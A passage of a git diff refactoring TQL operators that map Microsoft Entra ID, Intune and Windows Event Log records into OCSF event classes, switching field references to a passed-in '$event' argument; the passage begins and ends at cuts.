user: { - uid: move graph.initiatedBy.user.id?, - name: graph.initiatedBy.user.userPrincipalName?.split("@")[0]?, - domain: graph.initiatedBy.user.userPrincipalName?.split("@")[1]?, - email_addr: move graph.initiatedBy.user.userPrincipalName?, - full_name: move graph.initiatedBy.user.displayName?, + uid: move $event.graph.initiatedBy.user.id?, + name: $event.graph.initiatedBy.user.userPrincipalName?.split("@")[0]?, + domain: $event.graph.initiatedBy.user.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.initiatedBy.user.userPrincipalName?, + full_name: move $event.graph.initiatedBy.user.displayName?, type_id: 1, }, } - ocsf.src_endpoint = { - ip: move graph.initiatedBy.user.ipAddress?, + $event.ocsf.src_endpoint = { + ip: move $event.graph.initiatedBy.user.ipAddress?, } -} else if graph.initiatedBy.app? != null { - ocsf.actor = { - app_name: move graph.initiatedBy.app.displayName?, - app_uid: move graph.initiatedBy.app.appId?, +} else if $event.graph.initiatedBy.app? != null { + $event.ocsf.actor = { + app_name: move $event.graph.initiatedBy.app.displayName?, + app_uid: move $event.graph.initiatedBy.app.appId?, user: { - uid: move graph.initiatedBy.app.servicePrincipalId?, + uid: move $event.graph.initiatedBy.app.servicePrincipalId?, type_id: 4, }, } } -drop graph.initiatedBy? +drop $event.graph.initiatedBy? let $account_activity_ids = { "Add user": 1, @@ -60,87 +65,87 @@ let $group_activity_ids = { "Add group": 6, } -match graph.category { +match $event.graph.category { "GroupManagement" => { - graph._ocsf_class = "group_management" + $event.graph._ocsf_class = "group_management" } - "UserManagement" if $group_activity_ids[ocsf.message]? != null => { - graph._ocsf_class = "group_management" + "UserManagement" if $group_activity_ids[$event.ocsf.message]? != null => { + $event.graph._ocsf_class = "group_management" } "UserManagement" => { - graph._ocsf_class = "account_change" + $event.graph._ocsf_class = "account_change" } _ => { - graph._ocsf_class = "entity_management" + $event.graph._ocsf_class = "entity_management" } } -match graph._ocsf_class { +match $event.graph._ocsf_class { "group_management" => { @name = "ocsf.group_management" - ocsf.class_uid = 3006 - ocsf.activity_id = $group_activity_ids[ocsf.message]? else 99 - graph._target_groups = graph.targetResources.where(r => r.Type? == "Group" or r.type? == "Group") - graph._target_users = graph.targetResources.where(r => r.Type? == "User" or r.type? == "User") - ocsf.group = { - uid: graph._target_groups[0]?.id? else graph.targetResources[0]?.id?, - name: graph._target_groups[0]?.displayName? else graph.targetResources[0]?.displayName?, + $event.ocsf.class_uid = 3006 + $event.ocsf.activity_id = $group_activity_ids[$event.ocsf.message]? else 99 + $event.graph._target_groups = $event.graph.targetResources.where(r => r.Type? == "Group" or r.type? == "Group") + $event.graph._target_users = $event.graph.targetResources.where(r => r.Type? == "User" or r.type? == "User") + $event.ocsf.group = { + uid: $event.graph._target_groups[0]?.id? else $event.graph.targetResources[0]?.id?, + name: $event.graph._target_groups[0]?.displayName? else $event.graph.targetResources[0]?.displayName?, } - if graph._target_users[0]? != null { - ocsf.user = { - uid: graph._target_users[0]?.id?, - full_name: graph._target_users[0]?.displayName?, - email_addr: graph._target_users[0]?.userPrincipalName?, + if $event.graph._target_users[0]? != null { + $event.ocsf.user = { + uid: $event.graph._target_users[0]?.id?, + full_name: $event.graph._target_users[0]?.displayName?, + email_addr: $event.graph._target_users[0]?.userPrincipalName?, type_id: 1, } } - drop graph._target_groups? - drop graph._target_users? + drop $event.graph._target_groups? + drop $event.graph._target_users? } "account_change" => { @name = "ocsf.account_change" - ocsf.class_uid = 3001 - ocsf.activity_id = $account_activity_ids[ocsf.message]? else 99 - ocsf.user = { - uid: graph.targetResources[0]?.id?, - full_name: graph.targetResources[0]?.displayName?, + $event.ocsf.class_uid = 3001 + $event.ocsf.activity_id = $account_activity_ids[$event.ocsf.message]? else 99 + $event.ocsf.user = { + uid: $event.graph.targetResources[0]?.id?, + full_name: $event.graph.targetResources[0]?.displayName?, type_id: 1, } } _ => { @name = "ocsf.entity_management" - ocsf.class_uid = 3004 - match graph.operationType { + $event.ocsf.class_uid = 3004 + match $event.graph.operationType { "Add" => { - ocsf.activity_id = 1 + $event.ocsf.activity_id = 1 } "Read" => { - ocsf.activity_id = 2 + $event.ocsf.activity_id = 2 } "Update" => { - ocsf.activity_id = 3 + $event.ocsf.activity_id = 3 } "Delete" => { - ocsf.activity_id = 4 + $event.ocsf.activity_id = 4 } _ => { - ocsf.activity_id = 99 + $event.ocsf.activity_id = 99 } } - ocsf.entity = { - uid: graph.targetResources[0]?.id?, - name: graph.targetResources[0]?.displayName?, + $event.ocsf.entity = { + uid: $event.graph.targetResources[0]?.id?, + name: $event.graph.targetResources[0]?.displayName?, } } } -drop graph._ocsf_class +drop $event.graph._ocsf_class -if ocsf.activity_id == 99 { - ocsf.activity_name = ocsf.message +if $event.ocsf.activity_id == 99 { + $event.ocsf.activity_name = $event.ocsf.message } -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Preserve targetResources in unmapped because modifiedProperties often carry // the security-relevant before/after values. -drop graph.operationType? -drop graph.category? +drop $event.graph.operationType? +drop $event.graph.category? diff --git a/microsoft/operators/graph/ocsf/events/managed_device.tql b/microsoft/operators/graph/ocsf/events/managed_device.tql index a58a5b4..f3bf01f 100644 --- a/microsoft/operators/graph/ocsf/events/managed_device.tql +++ b/microsoft/operators/graph/ocsf/events/managed_device.tql @@ -1,70 +1,75 @@ --- description: Microsoft Intune managed device → OCSF Device Inventory Info (5001) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.inventory_info" -ocsf.metadata.product.name = "Microsoft Intune" -ocsf.metadata.log_name = "deviceManagement/managedDevices" -ocsf.metadata.profiles = ["cloud", "host"] +$event.ocsf.metadata.product.name = "Microsoft Intune" +$event.ocsf.metadata.log_name = "deviceManagement/managedDevices" +$event.ocsf.metadata.profiles = ["cloud", "host"] -ocsf.category_uid = 5 -ocsf.class_uid = 5001 -ocsf.activity_id = 2 // Collect -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.lastSyncDateTime) +$event.ocsf.category_uid = 5 +$event.ocsf.class_uid = 5001 +$event.ocsf.activity_id = 2 // Collect +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.lastSyncDateTime) -match graph.complianceState { +match $event.graph.complianceState { "compliant" => { - graph._is_compliant = true - drop graph.complianceState + $event.graph._is_compliant = true + drop $event.graph.complianceState } "noncompliant" | "nonCompliant" => { - graph._is_compliant = false - drop graph.complianceState + $event.graph._is_compliant = false + drop $event.graph.complianceState } _ => {} } -match graph.managedDeviceOwnerType { +match $event.graph.managedDeviceOwnerType { "personal" => { - graph._is_personal = true - drop graph.managedDeviceOwnerType + $event.graph._is_personal = true + drop $event.graph.managedDeviceOwnerType } "company" => { - graph._is_personal = false - drop graph.managedDeviceOwnerType + $event.graph._is_personal = false + drop $event.graph.managedDeviceOwnerType } _ => {} } -ocsf.device = { - uid: ocsf.metadata.original_event_uid, - uid_alt: move graph.azureADDeviceId?, - name: move graph.deviceName?, +$event.ocsf.device = { + uid: $event.ocsf.metadata.original_event_uid, + uid_alt: move $event.graph.azureADDeviceId?, + name: move $event.graph.deviceName?, type_id: 0, os: { - name: move graph.operatingSystem?, - version: move graph.osVersion?, + name: move $event.graph.operatingSystem?, + version: move $event.graph.osVersion?, }, - model: move graph.model?, + model: move $event.graph.model?, hw_info: { - vendor_name: move graph.manufacturer?, - serial_number: move graph.serialNumber?, + vendor_name: move $event.graph.manufacturer?, + serial_number: move $event.graph.serialNumber?, }, owner: { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, - is_compliant: move graph._is_compliant?, + is_compliant: move $event.graph._is_compliant?, is_managed: true, - is_personal: move graph._is_personal?, - first_seen_time: time(move graph.enrolledDateTime?), + is_personal: move $event.graph._is_personal?, + first_seen_time: time(move $event.graph.enrolledDateTime?), } -ocsf.device.hostname = ocsf.device.name +$event.ocsf.device.hostname = $event.ocsf.device.name // Intune-specific health attestation, ownership, and management-agent details // stay in unmapped until there is a precise OCSF target. diff --git a/microsoft/operators/graph/ocsf/events/risk_detection.tql b/microsoft/operators/graph/ocsf/events/risk_detection.tql index 4178e88..09b7bed 100644 --- a/microsoft/operators/graph/ocsf/events/risk_detection.tql +++ b/microsoft/operators/graph/ocsf/events/risk_detection.tql @@ -1,19 +1,24 @@ --- description: Microsoft Entra ID risk detection → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.metadata.product.name = "Microsoft Entra ID Protection" -ocsf.metadata.log_name = "identityProtection/riskDetections" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID Protection" +$event.ocsf.metadata.log_name = "identityProtection/riskDetections" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.detectedDateTime) -ocsf.end_time = time(move graph.lastUpdatedDateTime?) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.detectedDateTime) +$event.ocsf.end_time = time(move $event.graph.lastUpdatedDateTime?) let $risk_levels = { none: 1, @@ -27,10 +32,10 @@ let $risk_level_ids = { medium: 2, high: 3, } -ocsf.severity_id = $risk_levels[graph.riskLevel]? else 0 -ocsf.risk_level_id = $risk_level_ids[graph.riskLevel]? -if ocsf.risk_level_id != null { - drop graph.riskLevel? +$event.ocsf.severity_id = $risk_levels[$event.graph.riskLevel]? else 0 +$event.ocsf.risk_level_id = $risk_level_ids[$event.graph.riskLevel]? +if $event.ocsf.risk_level_id != null { + drop $event.graph.riskLevel? } let $statuses = { @@ -41,48 +46,48 @@ let $statuses = { remediated: 4, dismissed: 3, } -ocsf.status_id = $statuses[graph.riskState]? -if ocsf.status_id != null { - drop graph.riskState? +$event.ocsf.status_id = $statuses[$event.graph.riskState]? +if $event.ocsf.status_id != null { + drop $event.graph.riskState? } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, - title: move graph.riskEventType?, - desc: move graph.riskDetail?, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, + title: move $event.graph.riskEventType?, + desc: move $event.graph.riskDetail?, product: { - name: move graph.source?, + name: move $event.graph.source?, vendor_name: "Microsoft", }, } -ocsf.evidences = [{ +$event.ocsf.evidences = [{ actor: { user: { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, }, src_endpoint: { - ip: move graph.ipAddress?, + ip: move $event.graph.ipAddress?, location: { - city: move graph.location.city?, - country: move graph.location.countryOrRegion?, + city: move $event.graph.location.city?, + country: move $event.graph.location.countryOrRegion?, }, }, }] -drop graph.location? +drop $event.graph.location? -ocsf.resources = [{ - name: ocsf.evidences[0].actor.user.email_addr, - uid: ocsf.evidences[0].actor.user.uid, +$event.ocsf.resources = [{ + name: $event.ocsf.evidences[0].actor.user.email_addr, + uid: $event.ocsf.evidences[0].actor.user.uid, type: "User", role_id: 3, }] -ocsf.is_alert = true +$event.ocsf.is_alert = true diff --git a/microsoft/operators/graph/ocsf/events/risky_user.tql b/microsoft/operators/graph/ocsf/events/risky_user.tql index 7b2db9a..aa68acc 100644 --- a/microsoft/operators/graph/ocsf/events/risky_user.tql +++ b/microsoft/operators/graph/ocsf/events/risky_user.tql @@ -1,18 +1,23 @@ --- description: Microsoft Entra ID risky user → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.metadata.product.name = "Microsoft Entra ID Protection" -ocsf.metadata.log_name = "identityProtection/riskyUsers" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID Protection" +$event.ocsf.metadata.log_name = "identityProtection/riskyUsers" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.riskLastUpdatedDateTime) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.riskLastUpdatedDateTime) let $risk_levels = { none: 1, @@ -26,10 +31,10 @@ let $risk_level_ids = { medium: 2, high: 3, } -ocsf.severity_id = $risk_levels[graph.riskLevel]? else 0 -ocsf.risk_level_id = $risk_level_ids[graph.riskLevel]? -if ocsf.risk_level_id != null { - drop graph.riskLevel? +$event.ocsf.severity_id = $risk_levels[$event.graph.riskLevel]? else 0 +$event.ocsf.risk_level_id = $risk_level_ids[$event.graph.riskLevel]? +if $event.ocsf.risk_level_id != null { + drop $event.graph.riskLevel? } let $statuses = { @@ -40,26 +45,26 @@ let $statuses = { remediated: 4, dismissed: 3, } -ocsf.status_id = $statuses[graph.riskState]? -if ocsf.status_id != null { - drop graph.riskState? +$event.ocsf.status_id = $statuses[$event.graph.riskState]? +if $event.ocsf.status_id != null { + drop $event.graph.riskState? } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, title: "Risky user", - desc: move graph.riskDetail?, + desc: move $event.graph.riskDetail?, } -ocsf.resources = [{ - uid: ocsf.finding_info.uid, - name: move graph.userPrincipalName?, +$event.ocsf.resources = [{ + uid: $event.ocsf.finding_info.uid, + name: move $event.graph.userPrincipalName?, type: "User", role_id: 3, owner: { - full_name: move graph.userDisplayName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, }] -ocsf.is_alert = true +$event.ocsf.is_alert = true diff --git a/microsoft/operators/graph/ocsf/events/sign_in.tql b/microsoft/operators/graph/ocsf/events/sign_in.tql index 613ec64..aacb111 100644 --- a/microsoft/operators/graph/ocsf/events/sign_in.tql +++ b/microsoft/operators/graph/ocsf/events/sign_in.tql @@ -1,128 +1,133 @@ --- description: Microsoft Entra ID sign-in log → OCSF Authentication (3002) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.metadata.product.name = "Microsoft Entra ID" -ocsf.metadata.log_name = "auditLogs/signIns" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID" +$event.ocsf.metadata.log_name = "auditLogs/signIns" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.time = time(move graph.createdDateTime) +$event.ocsf.time = time(move $event.graph.createdDateTime) -ocsf.user = { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, +$event.ocsf.user = { + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, } -ocsf.actor = { - user: ocsf.user, +$event.ocsf.actor = { + user: $event.ocsf.user, } -ocsf.service = { - uid: move graph.appId?, - name: move graph.appDisplayName?, +$event.ocsf.service = { + uid: move $event.graph.appId?, + name: move $event.graph.appDisplayName?, } -ocsf.dst_endpoint = { - uid: move graph.resourceId?, - svc_name: move graph.resourceDisplayName?, +$event.ocsf.dst_endpoint = { + uid: move $event.graph.resourceId?, + svc_name: move $event.graph.resourceDisplayName?, } -ocsf.src_endpoint = { - ip: move graph.ipAddress?, +$event.ocsf.src_endpoint = { + ip: move $event.graph.ipAddress?, location: { - city: move graph.location.city?, - country: move graph.location.countryOrRegion?, + city: move $event.graph.location.city?, + country: move $event.graph.location.countryOrRegion?, }, os: { - name: move graph.deviceDetail.operatingSystem?, + name: move $event.graph.deviceDetail.operatingSystem?, }, - uid: move graph.deviceDetail.deviceId?, + uid: move $event.graph.deviceDetail.deviceId?, } let $status_ids = { "0": 1, } -ocsf.status_id = $status_ids[graph.status.errorCode.string()]? else 2 -if ocsf.status_id == 2 { - ocsf.severity_id = 2 +$event.ocsf.status_id = $status_ids[$event.graph.status.errorCode.string()]? else 2 +if $event.ocsf.status_id == 2 { + $event.ocsf.severity_id = 2 } -ocsf.status_code = (move graph.status.errorCode).string() -ocsf.status_detail = move graph.status.failureReason? -drop graph.status? -drop graph.location? -drop graph.deviceDetail? +$event.ocsf.status_code = (move $event.graph.status.errorCode).string() +$event.ocsf.status_detail = move $event.graph.status.failureReason? +drop $event.graph.status? +drop $event.graph.location? +drop $event.graph.deviceDetail? -ocsf.is_mfa = graph.mfaDetail? != null -if graph.mfaDetail.authMethod? != null { - graph._auth_factor_type = graph.mfaDetail.authMethod - match graph._auth_factor_type.to_lower() { +$event.ocsf.is_mfa = $event.graph.mfaDetail? != null +if $event.graph.mfaDetail.authMethod? != null { + $event.graph._auth_factor_type = $event.graph.mfaDetail.authMethod + match $event.graph._auth_factor_type.to_lower() { "sms" => { - graph._auth_factor_type_id = 1 - graph._auth_factor_type = "SMS" + $event.graph._auth_factor_type_id = 1 + $event.graph._auth_factor_type = "SMS" } "phone" | "phone call" | "voice" | "voicemail" => { - graph._auth_factor_type_id = 3 - graph._auth_factor_type = "Phone Call" + $event.graph._auth_factor_type_id = 3 + $event.graph._auth_factor_type = "Phone Call" } "push" | "push notification" | "authenticator app" => { - graph._auth_factor_type_id = 5 - graph._auth_factor_type = "Push Notification" + $event.graph._auth_factor_type_id = 5 + $event.graph._auth_factor_type = "Push Notification" } "oath" | "software oath token" | "otp" => { - graph._auth_factor_type_id = 7 - graph._auth_factor_type = "OTP" + $event.graph._auth_factor_type_id = 7 + $event.graph._auth_factor_type = "OTP" } "email" => { - graph._auth_factor_type_id = 8 - graph._auth_factor_type = "Email" + $event.graph._auth_factor_type_id = 8 + $event.graph._auth_factor_type = "Email" } _ => { - graph._auth_factor_type_id = 99 + $event.graph._auth_factor_type_id = 99 } } - ocsf.auth_factors = [{ - factor_type: move graph._auth_factor_type, - factor_type_id: move graph._auth_factor_type_id, + $event.ocsf.auth_factors = [{ + factor_type: move $event.graph._auth_factor_type, + factor_type_id: move $event.graph._auth_factor_type_id, }] - drop graph.mfaDetail.authMethod? + drop $event.graph.mfaDetail.authMethod? } -if graph.mfaDetail.authDetail? == null { - drop graph.mfaDetail? +if $event.graph.mfaDetail.authDetail? == null { + drop $event.graph.mfaDetail? } -match graph.conditionalAccessStatus { +match $event.graph.conditionalAccessStatus { "success" => { - ocsf.action_id = 1 - ocsf.disposition_id = 1 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 1 + $event.ocsf.disposition_id = 1 + drop $event.graph.conditionalAccessStatus } "failure" => { - ocsf.action_id = 2 - ocsf.disposition_id = 26 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 2 + $event.ocsf.disposition_id = 26 + drop $event.graph.conditionalAccessStatus } "notApplied" => { - ocsf.action_id = 3 - ocsf.disposition_id = 16 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 3 + $event.ocsf.disposition_id = 16 + drop $event.graph.conditionalAccessStatus } _ => {} } -ocsf.is_remote = true +$event.ocsf.is_remote = true -if graph.isInteractive? != null { - ocsf.logon_type_id = 99 - ocsf.logon_type = "interactiveUser" if graph.isInteractive else "nonInteractiveUser" - drop graph.isInteractive +if $event.graph.isInteractive? != null { + $event.ocsf.logon_type_id = 99 + $event.ocsf.logon_type = "interactiveUser" if $event.graph.isInteractive else "nonInteractiveUser" + drop $event.graph.isInteractive } diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 58e34e7..1d78335 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -7,14 +7,13 @@ args: type: field --- -graph = $event -ocsf = {} +$event = {...$event, graph: $event, ocsf: {}} -ocsf.cloud = { +$event.ocsf.cloud = { provider: "Azure", } -ocsf.metadata = { +$event.ocsf.metadata = { product: { vendor_name: "Microsoft", feature: { @@ -24,49 +23,49 @@ ocsf.metadata = { profiles: ["cloud"], version: "1.8.0", } -if graph.tenantId? != null { - ocsf.metadata.tenant_uid = move graph.tenantId +if $event.graph.tenantId? != null { + $event.ocsf.metadata.tenant_uid = move $event.graph.tenantId } -if graph.correlationId? != null { - ocsf.metadata.correlation_uid = move graph.correlationId +if $event.graph.correlationId? != null { + $event.ocsf.metadata.correlation_uid = move $event.graph.correlationId } -if graph.id? != null { - ocsf.metadata.original_event_uid = move graph.id +if $event.graph.id? != null { + $event.ocsf.metadata.original_event_uid = move $event.graph.id } -ocsf.severity_id = 1 +$event.ocsf.severity_id = 1 match @name { "microsoft.graph.sign_in" => { - microsoft::graph::ocsf::events::sign_in + microsoft::graph::ocsf::events::sign_in event=$event } "microsoft.graph.directory_audit" => { - microsoft::graph::ocsf::events::directory_audit + microsoft::graph::ocsf::events::directory_audit event=$event } "microsoft.graph.defender.alert" => { - microsoft::graph::ocsf::events::defender_alert + microsoft::graph::ocsf::events::defender_alert event=$event } "microsoft.graph.defender.incident" => { - microsoft::graph::ocsf::events::defender_incident + microsoft::graph::ocsf::events::defender_incident event=$event } "microsoft.graph.identity_protection.risk_detection" => { - microsoft::graph::ocsf::events::risk_detection + microsoft::graph::ocsf::events::risk_detection event=$event } "microsoft.graph.identity_protection.risky_user" => { - microsoft::graph::ocsf::events::risky_user + microsoft::graph::ocsf::events::risky_user event=$event } "microsoft.graph.intune.managed_device" => { - microsoft::graph::ocsf::events::managed_device + microsoft::graph::ocsf::events::managed_device event=$event } "microsoft.graph.intune.detected_app" => { - microsoft::graph::ocsf::events::detected_app + microsoft::graph::ocsf::events::detected_app event=$event } "microsoft.graph.intune.compliance_policy_setting_state_summary" => { - microsoft::graph::ocsf::events::compliance_policy_setting_state_summary + microsoft::graph::ocsf::events::compliance_policy_setting_state_summary event=$event } _ => { - microsoft::graph::ocsf::base + microsoft::graph::ocsf::base event=$event } } -$event = {...move ocsf, unmapped: move graph} +$event = {...$event.ocsf, unmapped: $event.graph} diff --git a/microsoft/operators/windows/ocsf/base.tql b/microsoft/operators/windows/ocsf/base.tql index a799938..143e5d0 100644 --- a/microsoft/operators/windows/ocsf/base.tql +++ b/microsoft/operators/windows/ocsf/base.tql @@ -1,10 +1,15 @@ --- description: Microsoft Windows Event Log → OCSF Base Event (0) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.base_event" -ocsf.category_uid = 0 -ocsf.class_uid = 0 -ocsf.activity_id = 0 -ocsf.type_uid = 0 +$event.ocsf.category_uid = 0 +$event.ocsf.class_uid = 0 +$event.ocsf.activity_id = 0 +$event.ocsf.type_uid = 0 diff --git a/microsoft/operators/windows/ocsf/events/account_change.tql b/microsoft/operators/windows/ocsf/events/account_change.tql index ba4dea9..cdc694e 100644 --- a/microsoft/operators/windows/ocsf/events/account_change.tql +++ b/microsoft/operators/windows/ocsf/events/account_change.tql @@ -3,12 +3,17 @@ description: > Account Change (EID 4720/4722–4726) → OCSF Account Change (3001) 4720 Create, 4722 Enable, 4723 Password Change, 4724 Password Reset, 4725 Disable, 4726 Delete +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.account_change" -ocsf.category_uid = 3 -ocsf.class_uid = 3001 +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3001 let $activities = { "4720": 1, // Create @@ -18,24 +23,24 @@ let $activities = { "4725": 5, // Disable "4726": 6, // Delete } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.user = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // EID 4720 carries many account-attribute fields (DisplayName, HomeDirectory, diff --git a/microsoft/operators/windows/ocsf/events/application_crash_report.tql b/microsoft/operators/windows/ocsf/events/application_crash_report.tql index 47e04f3..5287a13 100644 --- a/microsoft/operators/windows/ocsf/events/application_crash_report.tql +++ b/microsoft/operators/windows/ocsf/events/application_crash_report.tql @@ -1,32 +1,37 @@ --- description: Windows Error Reporting (EID 1001) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // WER fires after a crash has been recorded; the process has already exited. -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) -ocsf.status_code = move windows.EventData.param9 // exception code (e.g. c0000005) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_code = move $event.windows.EventData.param9 // exception code (e.g. c0000005) // param5 = faulting application name (short name, e.g. "payload.exe") // param6 = faulting application version // param12 = full path to the faulting application -ocsf.process = { - path: move windows.EventData.param12, +$event.ocsf.process = { + path: move $event.windows.EventData.param12, file: { type_id: 8, // Executable File - version: (move windows.EventData.param6).string(), + version: (move $event.windows.EventData.param6).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param5 = app name (redundant with process.name — dropped) @@ -34,4 +39,4 @@ ocsf.process.file.path = ocsf.process.path // param8 = faulting module version | left in unmapped // param10 = exception offset / // param1, param2, param3, param4, param11 = WER IDs, fault type, cab, report GUID — unmapped -drop windows.EventData.param5 +drop $event.windows.EventData.param5 diff --git a/microsoft/operators/windows/ocsf/events/application_error.tql b/microsoft/operators/windows/ocsf/events/application_error.tql index b003e48..e3f7c3e 100644 --- a/microsoft/operators/windows/ocsf/events/application_error.tql +++ b/microsoft/operators/windows/ocsf/events/application_error.tql @@ -1,36 +1,41 @@ --- description: Application Error (EID 1000) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) -ocsf.status_code = move windows.EventData.param7 // exception code (e.g. c0000005 = access violation) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_code = move $event.windows.EventData.param7 // exception code (e.g. c0000005 = access violation) // param9 = faulting process ID (hex string, e.g. "0x1a4c") // param11 = full path to the faulting application // param2 = faulting application version -ocsf.process = { - pid: int(move windows.EventData.param9, base=16), - path: move windows.EventData.param11, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.param9, base=16), + path: move $event.windows.EventData.param11, file: { type_id: 8, // Executable File - version: (move windows.EventData.param2).string(), + version: (move 